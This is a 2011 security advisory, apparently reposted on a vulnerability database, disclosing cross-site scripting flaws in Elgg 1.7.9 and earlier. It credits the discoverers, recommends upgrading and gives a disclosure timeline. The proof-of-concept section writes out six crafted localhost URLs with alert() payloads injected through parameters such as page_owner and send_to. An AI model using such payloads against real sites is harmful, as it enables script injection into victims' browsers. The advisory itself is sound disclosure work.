Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26724
HistoryAug 01, 2011 - 12:00 a.m.

Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities

2011-08-0100:00:00
vulners.com
263

Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities

  1. OVERVIEW

The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross
Site Scripting.

  1. BACKGROUND

Elgg is an award-winning social networking engine, delivering the
building blocks that enable businesses, schools, universities and
associations to create their own fully-featured social networks and
applications. Well-known Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php&#41;

  1. VULNERABILITY DESCRIPTION

Several parameters (page_owner, content,internalname, QUERY_STRING)
are not properly sanitized, which allows attacker to conduct Cross
Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.

  1. VERSIONS AFFECTED

Elgg 1.7.9 <=

  1. PROOF-OF-CONCEPT/EXPLOIT

XSS (Browser All)

N.B. User login is required to execute.

vulnerable parameters: page_owner, content,internalname, QUERY_STRING


REQUEST:

http://localhost/elgg/mod/file/search.php?subtype=file&amp;page_owner=&#37;22&#37;20style&#37;3d&#37;22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0&#37;22&#37;20onmouseover&#37;3d&#37;22alert&#37;28/XSS/&#37;29&#37;22&#37;20x=&#37;22f

http://localhost/elgg/mod/riverdashboard/?content=&#37;22&#37;20style&#37;3d&#37;22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0&#37;22&#37;20onmouseover&#37;3d&#37;22alert&#37;28/XSS/&#37;29&#37;22&#37;20x=&#37;22f&amp;callback=true

http://localhost/elgg/pg/embed/upload?internalname=&#37;22&#37;20onmouseover&#37;3d&#37;22alert&#37;28&#37;27XSS&#37;27&#37;29&#37;22&#37;20style&#37;3d&#37;22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0&#37;22

http://localhost/elgg/pg/pages/edit/&#37;22&#37;20onmouseover&#37;3d&#37;22alert&#37;28&#37;27XSS&#37;27&#37;29&#37;22&#37;20style&#37;3d&#37;22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0&#37;22

XSS (Exploitable in Older versions of Browsers - IE/FF)
vulnerable parameters: send_to,container_guid

REQUEST:

http://localhost/elgg/pg/messages/compose/?send_to=&#37;22&#37;20style&#37;3d&#37;22background-image&#37;3aurl&#37;28javascript:alert&#37;28/XSS/&#37;29&#37;29&#37;22&#37;20x=&#37;22s

Portion of RESPONSE:

<input type="hidden" name="send_to" value=""
style="background-image:url(javascript:alert(/XSS/))" x="s" />

REQUEST:

http://localhost/elgg/pg/pages/new/?container_guid=&#37;22&#37;20style&#37;3d&#37;22background-image&#37;3aurl&#37;28javascript:alert&#37;28/XSS/&#37;29&#37;29&#37;22&#37;20x=&#37;22

Portion of RESPONSE:

<input type="hidden" name="container_guid" value=""
style="background-image:url(javascript:alert(/XSS/))" x="s" />

  1. SOLUTION

Upgrade to 1.7.10 or higher.

  1. VENDOR

Curverider Ltd
http://www.curverider.co.uk/
http://elgg.org/

  1. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

  1. DISCLOSURE TIME-LINE

2011-06-09: vulnerability reported
2011-06-14: vendor released fixed version
2011-07-30: vulnerability disclosed

  1. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting
Project Home: http://elgg.org/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_&#40;XSS&#41;
CWE-79: http://cwe.mitre.org/data/definitions/79.html

#yehg [2011-07-30]


Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd